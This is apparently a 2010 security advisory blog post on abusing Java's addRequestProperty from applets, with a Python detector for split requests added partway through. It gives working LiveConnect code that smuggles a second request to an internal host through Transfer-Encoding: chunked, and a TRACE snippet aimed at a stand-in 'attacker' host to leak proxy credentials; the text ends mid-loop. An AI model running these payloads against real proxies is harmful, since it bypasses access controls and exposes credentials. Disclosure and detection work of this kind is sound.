
Tuesday, October 12, 2010

Http Request Splitting and Header Abuse with Java AddRequestProperty

Summary
It is possible to abuse the method addRequestProperty to:
  • inject new requests by abusing the request header Transfer-Encoding. The result is a well-known attack called HTTP Request Splitting [1][2][3].
  • gather information about the existence of an HTTP proxy.

Analysis
The applet sandbox allows requests to be made to the host the applet originates from, using the class java.net.URL. This is permitted by the Java same-origin policy (SOP).
Example:

// Same-origin request from the applet, driven through LiveConnect
f=new Packages.java.net.URL("http://appletoriginatinghost/");
g=f.openConnection();
g.setDoOutput(true);
g.setRequestMethod("GET") ;
// no request body is written in this baseline example
g.connect();
dis = new Packages.java.io.DataInputStream(g.getInputStream());

// log the response line by line
while((rl=dis.readLine())!=null){
log(rl) ;
}


We found that it is possible to force a split of an HTTP request by using
Request.addRequestProperty("Transfer-Encoding", "chunked");

A malicious user could use this to bypass access restrictions when a
forward proxy is in place.

In fact, when the request header Transfer-Encoding: chunked is set,
the payload is parsed according to RFC 2616:

f=new Packages.java.net.URL("http://appletoriginatinghost/");
g=f.openConnection();
g.setDoOutput(true);
g.setRequestMethod("GET") ;
// header added by the applet; an RFC 2616 parser then reads the body as chunks
g.addRequestProperty("Transfer-Encoding", "chunked");
dis2 = new Packages.java.io.DataOutputStream(g.getOutputStream());
// "0" is the terminating chunk; what follows is read as a second request
dis2.writeBytes("0\n\nGET http://someinternalHost HTTP/1.1\nHost: 10.1.1.1\n\n");
dis2.flush();
dis2.close();
g.connect();
dis = new Packages.java.io.DataInputStream(g.getInputStream());

// log the response line by line
while((rl=dis.readLine())!=null){
log(rl) ;
}
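
A defender-side check for the split described above, as an added example that is not code from the original post: a Python function that reads the first request of a captured client-to-proxy byte stream the way a lenient RFC 2616 parser would and reports a request line left over after the final chunk. The function names, the sample bytes and the outer request line `GET /` are constructed assumptions.

```python
import re
REQUEST_LINE = re.compile(rb"^[A-Z]+ \S+ HTTP/1\.[01]$")

def _readline(buf, pos):  # returns (line without CR/LF, next offset); bare LF accepted
    end = buf.find(b"\n", pos)
    if end == -1:
        return buf[pos:], len(buf)
    return buf[pos:end].rstrip(b"\r"), end + 1

def inspect_request(raw):
    """Findings for the first request in a captured client-to-proxy byte stream."""
    findings = []
    _, pos = _readline(raw, 0)                      # request line
    headers = {}
    while pos < len(raw):
        line, pos = _readline(raw, pos)
        if not line:                                # blank line ends the headers
            break
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    if b"chunked" not in headers.get(b"transfer-encoding", b""):
        return findings
    if b"content-length" in headers:
        findings.append("Transfer-Encoding and Content-Length both present")
    while pos < len(raw):                           # walk chunks as RFC 2616 describes
        size_line, pos = _readline(raw, pos)
        try:
            size = int(size_line.split(b";", 1)[0].strip(), 16)
        except ValueError:
            return findings + ["malformed chunk size"]
        if size == 0:
            break
        pos += size
        _, pos = _readline(raw, pos)                # line ending after chunk data
    while pos < len(raw):                           # skip trailers up to the blank line
        line, pos = _readline(raw, pos)
        if not line:
            break
    leftover, _ = _readline(raw, pos)
    if REQUEST_LINE.match(leftover):
        findings.append("request line after final chunk: " + leftover.decode("latin-1"))
    return findings

# Constructed sample: the page's payload carried as the body of one request.
BODY = b"0\n\nGET http://someinternalHost HTTP/1.1\nHost: 10.1.1.1\n\n"
SPLIT = (b"GET / HTTP/1.1\r\nHost: appletoriginatinghost\r\nTransfer-Encoding: chunked\r\n"
         b"Content-Length: " + str(len(BODY)).encode() + b"\r\n\r\n" + BODY)
if __name__ == "__main__":
    print(inspect_request(SPLIT))
```

A pipelining client also produces a request line after the final chunk, so the second finding carries the most weight when it appears together with the first.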



It can also be abused to obtain forward proxy information, such as the proxy password.

f=new Packages.java.net.URL("http://attacker/")
g=f.openConnection();
g.setRequestMethod("TRACE") ;
g.addRequestProperty("Max-Forwards", "0");

g.connect();
dis = new Packages.java.io.DataInputStream(g.getInputStream());

i=0
while(i<350){>